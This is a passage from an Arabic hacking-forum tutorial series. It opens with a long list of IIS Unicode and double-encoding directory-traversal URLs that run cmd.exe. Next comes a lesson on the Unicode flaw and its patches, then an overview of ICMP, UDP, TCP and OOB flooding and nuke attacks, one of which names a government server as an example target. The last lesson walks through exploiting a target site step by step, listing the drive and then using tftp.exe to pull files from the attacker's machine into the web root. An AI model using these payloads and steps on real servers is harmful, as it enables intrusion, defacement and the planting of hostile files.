/scripts/%c0%qe%c0%qe/%c0%qe%c0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%9u%cg%9u/%cg%9u%cg%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%ae%cg%ae/%cg%ae%cg%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%cg%qe%cg%qe/%cg%qe%cg%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%9u%d0%9u/%d0%9u%d0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%ae%d0%ae/%d0%ae%d0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%d0%qe%d0%qe/%d0%qe%d0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%9u%dg%7g%9u/%dg%7g%9u%dg%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%ae%dg%7g%ae/%dg%7g%ae%dg%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%7g%qe%dg%7g%qe/%dg%7g%qe%dg%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%9u%dg%80%9u/%dg%80%9u%dg%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%ae%dg%80%ae/%dg%80%ae%dg%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%80%qe%dg%80%qe/%dg%80%qe%dg%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%9u%dg%o0%9u/%dg%o0%9u%dg%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%ae%dg%o0%ae/%dg%o0%ae%dg%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%dg%o0%qe%dg%o0%qe/%dg%o0%qe%dg%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%ae%e0%7g%qe/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%9u%e0%80%9u/%e0%80%9u%e0%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%80%qe%e0%80%qe/%e0%80%qe%e0%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%e0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%9u%u0%80%9u/%u0%80%9u%u0%80%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%ae%u0%80%ae/%u0%80%ae%u0%80%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%80%qe%u0%80%qe/%u0%80%qe%u0%80%qe/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%u0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir
/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%bg%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%bg%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%bg%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%cg%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%ch%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%ch%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%s0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%s0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%s0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%s1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%s1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%s1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%t0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%t0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%t0%qf../winnt/system32/cmd.exe?/c+dir
/samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir


للتعمق في هذا الموضوع راجعوا شرح UNICODE - Internet Information Service IIS4 - IIS5 الموجود بالقسم هذا.
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الثالث والاربعين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:28 am


الدرس الثالث والاربعين
عثرة اليونيكود


تقوم لوحه محارف يونيكود بتحديد رقم مختلف لكل حرف من حروفها مهما كانت بيئة التشغيل
التي تعمل ضمنها المحارف حيث أن معظم الشركات المنتجة لنظم التشغيل تعتمد على اليونيكود
لجعل نظمها عامله بأكثر من لغه وفي نظام ويندز يمكن ان يشكل استعمال يونيكود ثغره
يمكن للهاكرز منها أن يعبثوا بالاجهزة المزودة وذلك بارسال عنون انترنت URL
يحوي على متتالية يونيكود UTF-8 غير صحيحة مجبرا بذلك الجهاز المزود على تشغيل جميع الملفات
التنفيذية الموجودة ضمن الدليل الذي يتم الهجوم عليه ويعرف هذا الهجوم باسم الهجمات التجاوزية
Directory Traversal Attack
فضمن نظام الويندز يتم تمثيل العلامات \ و / ضمن ويندز بالحروف 5% و 2% على التوالي
ومع ذلك يمكن تمثيل هذه العلامات باستخدام مايدعى بالمتتاليات بالغه الطول overlong
وهي عبارة عن متتاليات تزيد في طولها عما هو لازم لتمثيل حرف معين ضمن لوحه المحارف
حيث يمكن للهاكر تمثيل العلامة / بالحروف c0%af% DHz
(( طبعا احذف كلمه DHz علشان تطلع لك مضبوطة انا وضعتها علشان تطلع مضبوطة ))
مستخدما 2 بايت لتمثيل حرف يحتاج الى 1 بايت فقط ولما لم يكن مزود الانترنت IIS مكتوبا ليقوم بفحص
المتتاليات البالغه الطول فان وجود مثل هذه المتتاليات ضمن عنوان URL
يمكن له ان يتجاوز الاحتياطات الامنية لنظام ويندز واذا كان الطلب الوارد الى المزود واردا الى الدليل (( تنفيذي ))
فإن ماسيحدث هو ان جميع الملفات التنفيذيه .exe الموجودة في هذا الدليل ستبدأ بالعمل عشوائيا
وسيعتمد ضررها على نوعيه الملفات التنفيذية الموجودة ضمن هذا الدليل وتؤثر هذه العله على جميع نظم الويندزان تي4
التي تستخدم المزود IIS4 او ويندز 2000 الذي يستخدم IIS5 والتي لن يتم تطبيق حزمة الخدمات 2 عليها
وكي يحدد مدراء المعلوماتيه امكانية تعرضهم لمثل هذا الاختراق فما عليهم الا تشغيل الامر hfnetchk
وهي اداه مصممه كي يتمكن مدراء المعلوماتيه من اكتشاف الرقع التي تم تطبيقها على نظم التشغيل
ويمكن له ان يعمل عبر الشبكة ويمكن تنزيل هذا البرنامج من هذا العنوان :
http://www.microsoft.com/technet/tr...ls/hfnetchk.asp
وقم تم تصليح عثرة اليونيكود من الرقع التالية من مايكروسوفت :
Q269862 - MS00-057
Q269862 - MS00-078
Q277873 - MS00-086
Q293826 - MS00-026
Q301625 - MS00-044
اضافة الى حزمة الخدمات 2 لويندز 2000 واذا لم تكن اي من هذه الرقع موجودة فان النظام يكون عرضة لهذه العثرة
كما يمكن اختبار نظامك من خلال طباعه الامر التالي وتنفيذه من خلال مزود الويب IIS :
http://victim/scripts/..%c0%af../wi....exe?/c+dir+c:\
ويمكن تغيير هذا العنوان ليناسب تكوين جهاز معين واذا كان مدير النظام قد قام بالتخلص من دليل ملفات النصوص
التنفيذية Scripts ( كما هو مقترح ) فان هذا الامر لن يؤدي الى ايه نتائج ولذا يمكن للشخص الذي يجري الاختبار
ان يقوم بانشاء دليل cgi-bin بدلا من دليل النصوص التنفيذية وتطبيق هذا الامر عليه واذا كان النظام معرضا لهذه الثغره فانة سيقوم بارجاع قائمة تحتوي على جميع الملفات الموجودة على القرص الصلب
وقد قامت مايكروسوفت بتطوير برمجيات يمكنها اكتشاف هذه الثغره وحماية المستخدمين منها واحدها هو برنامج
IIS Lockdown والمصمم لمساعده مدراء الشبكات على اغلاق مزودات IIS ويمكن تنزيل هذا البرنامج من العنوان
http://www.microsoft.com/technet/se...ls/locktool.asp
كما ان هناك برنامج اخر وهو URLScan والذي يقوم بتصفييييية العديد من طلبات HTTP بما في ذلك تصفيييية
محارف اليونيكود UTF-8 ويتوفر هذا البرنامج على العنوان التالي :
http://www.microsoft.com/technet/security/URLScan.asp
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الرابع والاربعين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:28 am


الدرس الرابع والاربعين
أنواع الهجوم على الأجهزة


هناك أنواع مختلفة وكثيرة جدا من الهجوم على جهازك أثناء العمل على الشبكة
(أكثر بمراحل من أن اجمعها في موضوع واحد) ولكن سألخص بروتوكولات الأتصال هنا وطرق الهجوم عليها وسبل الحماية منه وانظمة التشغيل المتضررة بكل هجوم.


النوع الأول :
هجوم الـ(ICMP) او ما يسمى بـ (بروتوكول التحكم برسائل الأنترنت)
(InternetControlMessageProtocol). وهو يعتمد على أرسال رسائل خطأ مضمونة في حزمة واحدة على التي سي بي نفسه TCP/IP. على سبيل المثال أذا اردت الأتصال بهوست معين مثل سيرفر الايرسي (IRC Servers) وتجد صعوبة في الأتصال به وبرسالة مثل (Host Unreachable) أو (Connection Time Out) وهو من نوع (ICMP_Unreach Packets) أو حزم عدم الوصول.
والـICMP يمكن أستخدامه أيضا لمعرفة معلومات عن شبكة معينة.
والسؤال الآن هو كيف يمكن لهذا الهجوم ان يلحق الضرر بك؟ والأجابة هي انه عند ارسال ارسال حزم كبيرة و سريعة من البنق Ping الى TCP/IP الخاص بك (وهذا ما يسمى بالفلود Flood) ويتوجب على جهازك تحليل كل حزمة وتفصيلها والرد عليها وهذا بالتأكيد مالا يستطيعه لكبر حجمها وكثرتها مما يؤدي غالبا الى عمل ريست للأتصال (Reset Connection) سواء كان اتصال بهوست معين أو بموفو الخدمة الخاص بك ايضا (ISP)!!
والآن تخيل مثلاً خمسمائة جهاز يوجهون هجوما قويا ومتتاليا على سيرفر معين (مثلا سيرفر http://www.israel.gov)،/ هذا السيرفر لن يتمكن من الرد على كل اتصال موجه له بنفس الوقت بهذا الحجم والسرعة العاليين. مما يؤدي غالبا (بأستخدام توقيت وتخطيط مناسب) الى عزل هذا تقريبا عن بقية الشبكة .
ونوع آخر شهير جدا ويكثر أستخدامه في سيرفرات الايرسي او الشات وهو ICMP_Protocol_Unprotocol وهذا النوع يمكن أستخدامه لفصل أتصالك بسيرفر
محادثة معين. مثلا سيرفر المايكروسوفت شات لو انك متصل به على سيرفره irc.msn.com عبر المنفذ 6667 (منفذ شبكة محادثة MSN) وحدث انه تم قطع اتصالك بالسيرفر عدة مرات متتالية دون سبب محدد، فأنك قد تعرضت للهجوم على TCP/IP الخاص بك من النوع المذكور سابقا والذي يعتمد على ارسال رسائل عديدة وسريعة الى المنفذ 6667 من جهاز العدو وعبر سيرفر المحادثة واخيرا الى جهازك مما يؤدي الى تضعيف المنفذ 6667 وبالتالي قطع اتصالك بالسيرفر المذكور.

والحماية من هذا النوع من الهجوم كالتالي:
برامج عديدة يمكنك استخدامها مثل الفايروول الذي يوفر درجة معقولة من الحماية ضد هذا الهجوم. وهناك ايضا برامج كتبت خصيصا لمنع مثل هذا الهجوم مثل
Nuke Napper
ICMP Watcher
ConSeal PC Firewall
والتي تقوم بحجب هذه الحزم عن جهازك (Blocking ICMP Packets)
(ملحوظة: جميع البرامج السابقة لا توفر الحماية مائة بالمائة وانما هي مضمونة بخاصة اذا كنت معرض لهجوم من مصادر محدودة او مصدر واحدبأتصال غير قوي جدا)

نوع اخر من الحماية هو الباتشات التي تطلقها الشركات مثل الباتش الذي اطلقته مايكروسوفت لمستخدمي ويندوز 95 لأغلاق منفذ 139 ضد هجوم معين منICMP و هو SPing والذي كان يؤدي الى عمل ريست للأتصال بالشبكة بالكامل. وبالطبع تمت معالجة هذا العيب في الأصدارات التالية من ويندوز. وبرغم انه نوع قديم من الهجوم واغلب الأنظمة الآن متوفرة لديها الحماية منه الا اني متأكد بانه مازال هنالك اشخاص معرضين لمثل هذا النوع من الهجوم.

الأنظمة المعرضة لهجوم الـICMP
ويندوز 95 وويندوز NT الأصدار القديم كانا معرضين لخطر الهجوم من قبل فلود الـICMP الذي كان يؤدي الى عمل كراش Crash لهما. وبغض النظر عن اي نظام تستخدم فأنه معرض لخطر الفلود من قبل ICMP.

----------------------------------------------------------------
UDP :
او ما يسمى بـ(UserDatagramProtocol) وهو مصمم لبرامج معينة لا تحتاج الى تقسيم رسائلها الى حزم اصغر وارسالها مثل TCP الذي سيتم شرحه لاحقا. وهو بالضبط كالتي سي بي من حيث تقسيمه الى منافذ متعددة لتتمكن عدة برامج من استخدامه في نفس الوقت. ويحتوي على رأس توجيهي مثل التي سي بي ايضا ولكنه اقصر منه. وعلى كل حال له ارقام للمصدر وارقام للوجهة. وهذا البروتوكول يستخدم غالبا في عملية البحث عن اسم موقع كما سيتم شرحه بالاسفل.
من السابق نستنتج ان الفلود هذا البروتوكول يكون ضعيف جدا مقارنة بغيره من البروتوكولات وذلك لصغر حجم بياناته. ولكنه هجوم لايمكن تجاهله وبخاصة اذا وصل الى مرحلة عالية وسرعة عالية فأنه يؤدي الى أبطاء اتصالك ونادرا ما يقطع اتصالك.

الحماية:
البرنامج الوحيد الذي رأيته ويقوم بالحماية من فلود اليو دي بي هو الفايروول (من نوع كونسيل ConSeal). ولكنني متأكد من وجود أدوات اخرى للحماية منه

أنظمة التشغيل المتضررة منه:
جميع اصدارات الويندوز وحتى اليونكس نفسه من الممكن ايقافه اذا وجهت له حزم ضخمة من اليو دي بس في الوقت المناسب

----------------------------------------------------
TCP:
وهو ما يسمى ببروتوكول التحكم في الأرسال (TransmissionControlProtocol). وهو بروتوكول مسؤول عن تقسيم الرسائل الواردة الى حزم صغيرة ومن ثم يعيد تجميعها بشكل وترتيب جديد ليتمكن جهازك من قراءتها. وفي اغلب البرامج تكون الرسائل صغيرة بحيث يمكن ضمها في حزمة واحدة فقط. مثلا عند كتابتك لموقع في متصفحك فان نظامك يتوجب عليه ان يقوم بعملية التحويل الشهيرة من اسم الى عنوان (شبيه برقم الآيبي) ومن ثم يرسل الأمر بالبحث عنه والذي عادة ما يكون في حزمة واحدة.
والتي سي بي اي بي بالطبع يقوم بأعمال اخرى اضافة لعملية التقسيم والتجميع فأنه يقوم بالتأكد من وصول المعلومة المطلوبة الى جهازك وأعادة ارسال حزمة الطلب اذا توجب الأمر.
والسؤال هنا: كيف يمكن الهجوم على بروتوكول كهذا يقوم بتقسيم الرسائل الكبيرة!?
الأجابة هي انه يمكن الهجوم عليه مثل الهجوم على النظامين السابقين بالضبط أي عن طريق الفلود. وهنا يكون عن طريق ارسال حزم طلب كثيرة اليه وبالطبع سيحاول الرد عليها كلها وهذا مالايستطيعه وبخاصة اذا كانت الحزم كثيرة جدا وفي وقت زمني قليل. وعند كمية معينة بسرعة عالية معينة تعتمد على قوة اتصالك يبدأ التأثير الكبير لهكذا هجوم.

الحماية منه :
بالطبع برامج الفايروول وبرامج اخرى عديدة تجدها بمواقع الهكر منتشرة وتقوم بحمايتك من الفلود الموجه للـTCP الخاص بك.

أنظمة التشغيل المتأثرة:
جميع اصدارات الويندوز تتأثر بهذا الهجوم وأيضا جميع طبقات اليونكس تتأثر بهجوم معين يؤدي الى ايقافها مؤقتا (لاق Lag) أو حتى فصل اتصالها وبالطبع يعتمد على درجة الحماية للسيرفر المتعرض للهجوم.

ملاحظة: أشهر واكثر برنامج منتشر يقوم بالهجوم على هذا البروتوكول لنظام ويندوز هو برنامج (Port Fuck) الذي يقوم بالأتصال عبر منافذ التي سي بسرعة علية ومن ثم الفصل واعادة العملية عدة مرات بسرعة. وبالنسبة للينوكس فهنالك انواع عديدة من نصوص (.C) التي تقوم بهجوم كهذا.
----------------------------------------------------

OOB
أو ما يسمى بـ(OutOfBand). وهو خطير جداً لأنه لا يحتاج لعمل شئ كثير لأنشاء تأثير كبير في جهاز الضحية.
وعن طريق أرسال معلومات OOB الى منفذ رقم 139 الخاص بويندوز NT (الأصدارات القديمة بالطبع) فأنه من الممكن بسهولة أحداث أثر كبير في جهاز الضحية منها تدمير TCP الخاص بجهاز الضحية (stop 0xA error in tcp.sys). وكل ما تحتاج اليه هو الأتصال بالمنفذ المفتوح فقط (Connect the Socket). أي بالطريقة التالية: (الأتصال بمنفذ رقم 139 في جهاز الضحية ومن ثم المعلومات المضرة به - send the MSG_OOB flag set).
وبالطبع فأن ويندوز 95 كذلك معرض لهذا النوع من الهجوم ولكن بضرر أقل حيث انه لا يتم تجميده بالكامل ولكن يفقد أتصاله او يضعفه.
وقد تجد صعوبة في تنفيذ الكلام السابق ولكن لاداعي لأجهاد نفسك فبرامج الهجوم عن طريق OOB تكاد تملأ مواقع الهكر في كل مكان وبأشكال والوان عديدة مثل برنامح (WinNuke) القديم، والتي لا تطلب منك سوى رقم الآيبي للضحية فقط ومن ثم الضغط على زر Nuke. ولكنه أيجاد ضحية يتضرر بهجوم كهذا قريب من المستحيل في الوقت الحالي.
وبالطبع وجود عيب كهذا في نظام شهير ومنتشر كالويندوز يؤدي الى وجود باتش مخصص لأغلاق المنفذ واصلاح النظام. (يعني ترقيع). أسم الباتش (OOB Fix) ويمكنك الحصول عليه من اي موقع هكر تقريبا.

الحماية من OOB:
كما ذكرت سابقا يمكنك استخدام (رقعة المايكروسوت) او هنالك عدة برامج تحمي من مثل هذا الهجوم عن طريق مراقبة المنفذ 139 وصد الهجوم القادم عبره. وتقريبا جميع انواع الفايروول تتعرف على هجوم قديم كهذا.

أنظمة التشغيل المتضررة بالـOOB:
ويندوز 95 وويندوز NT القديم -كما ذكرت سابقا- تتضرر بهكذا هجوم عليها.
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الخامس والاربعين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:29 am


الدرس الخامس والاربعين
IIS بداية نعرف ماهي

هي خدمه متواجدة في ويندوز الفين بروفشنال وويندوز ان تي IISالـ

IIS5.0...وويندوز الفين يمتلك الاصدارة الخامسة من ملقم معلومات الانترنت

بسم الله نبدأ
توجد نقطة ضعف في الاي اي اس 4 او 5 وهذه النقطة تستغل بطريقة سهلة جداً
وتسمى هذه النقطة باليونيكود
وتنفيذها سهلاً لايحتاج الى خبرة عميقة في مجال اختراق المواقع
ولكن نقف عند هذه النقطة للمبتئيدئن
المبتدئين عامةً يفكرون الان في اختراق عدة مواقع شهيرة بهذه الطريقة
ولكن لا هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة
لان نقطة الضعف هذه لاتوجد الا في ويندوز الفين او ان تي
وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس
أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة
لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الاضعاف الموجودة في الان تي
لكن بتلك الطريقة قد يكونون جعلو حاجزاً لهم من الهكرة
ولكن ليس دائماً
وتنفذ من داخل المتصفح
وطريقة تنفيذ الثغرة كالاتي :
http://www.xxxxxx.com/scripts/..&Aacute;../winnt/system32/cmd.exe?/c+dir+c:\
ركزو هنا الان بعد دوت كوم بدأت تنفيذ الثغرة
وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي c:هذه الثغرة تسمح لك بــ عرض جميع ملفات
وتوجد أكثر من ثغرة وهي
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
وطريقة تنفيذها من المتصفح
ومكان تنفيذها بعد اسم الموقع
مثال :
http://www.xxxxx.com/à/€/à/€/à/€/¯../winnt/system32/cmd.exe/?/c\+
أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
Dir هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية
الخطوة الثانية عمل ابلود للملف الذي تريد تحميله
وعمل الأبلود أيضاً لايحتاج الى خبرة
لكن هنالك شروط لكي تعمل ابلود
يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية
وللكي تتأكد إتبع الاتي
يجب الدخول على ملف السستم32 ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في تنفيذها
مثال:
http://www.xxxxxx.com/scripts/..&Aacute;../winnt/system32/cmd.exe?/c+dir+c:\
هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات
لاحظ التغير
http://www.xxxxxx.com/scripts/..&Aacute;../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32\
ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز Winnt\Sytem32\
أي يجب عليك الدخول على هذه الملفات لكي تتأكد
بعض القراء يتسالون ..... الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط للتطابقها يجب عليك الدخول باي كان على مللف السستم
ممكن يكون احد القراء اشتغلت معاه هذه الثغرة
http://www.xxxxx.com/scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c+dir+c:\
ويقول كيف ادخل على ملف السستم
الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم 32
اي بعد هذا الامتداد
c+dir+c:\هنا تضيف أسماء الملفات
http://www.xxxxx.com/scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c+dir+c:\Winnt\System32\
كما قلنا سابقاَ لاتحتاج الى خبرة
وبعد دخول ملف السستم ستظهر لك محتوياته
ويجب على آنذاك البحث عن برنامج يسمي
tftp.exe يعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز
لان هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة
ولو لقيت البرنامج اتفاءل بالخير يعني بإذن الله تعبك ماهو رايح على الفاضي
.................................................. .......................................
والشرط الثاني هو
يجب أن يكون عندك برنامج التي إف تي بي
وهذا البرنامج تقدر تنزله من هذا العنوان
www.geocities.com/anorR1234/tftpd32.zip
C:\وبعد ماتنزل البرنامج وتفك الضغط منه من الافضل إنك تحطه داخل الـ
وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي
تحطه في السي الى داخل جهازك مو الى دالخل الموقع
وتشغل البرنامج
tftp32.exe وتتركه يعمل الى أن تنتهى من مهمتك الأساسية
C:\أسمع كلامي وحط كل شي في
لأنك لو حطيتها بإذن الله راح تنجح المهمه
-----------------------------------------------------------------
الان بدأنا في النقطة الخطرة وهي تحميل الملفات
مع العلم أني اقصد بالتحميل الابلود
أي
أبلود = تحميل
مو تجميل كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Smile
وتحميل الملفات طريقة معقدة نسبياً بس أنا متفائل بالخير لأني معتقد أنكم راح تفهمو
المهم نرجع لموضوعنا
المهم طريقة نسخ الملفات تضاف ايضاً الى المتصفح
وتضاف بهذه الطريقة
مثال :
http://www.xxxxx.com/scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c+dir+c:\
تخيل الثغرة هذه اشتغلت معاك
ويجب عليك إنك تمسح بعض الإضافات من الثغرة لكي تضيف امر النسخ
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
يعني الى راح نمسحه من الثغرة بيكون هذه الاضافة
/c+dir+c:\
عشان تظيف بدالها
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة
http://www.xxxxx.com/scripts/..ü€€€€¯../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
شايفين ياشباب إش الى اتغير
بس لازم أيضاً إنك تغير اللازم في أمر النسخ
مثل
tftp.exe هذا سيبه في حاله لانه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الان
"-i" هذا برضه سيبه لانه مهم
1.1.1.1 هنا بدال الارقام هذا تكتب الايبي تبع جهازك وعشان تتأكد من الايبي لمن تشغب التي اف تي بي راح يطلع ايبي وهذا الايبي الى طلعلك هو الى تكتبه
GET هذه الاضافة سيبها في حالها لانها تعتبر شرط في نسخ المفات
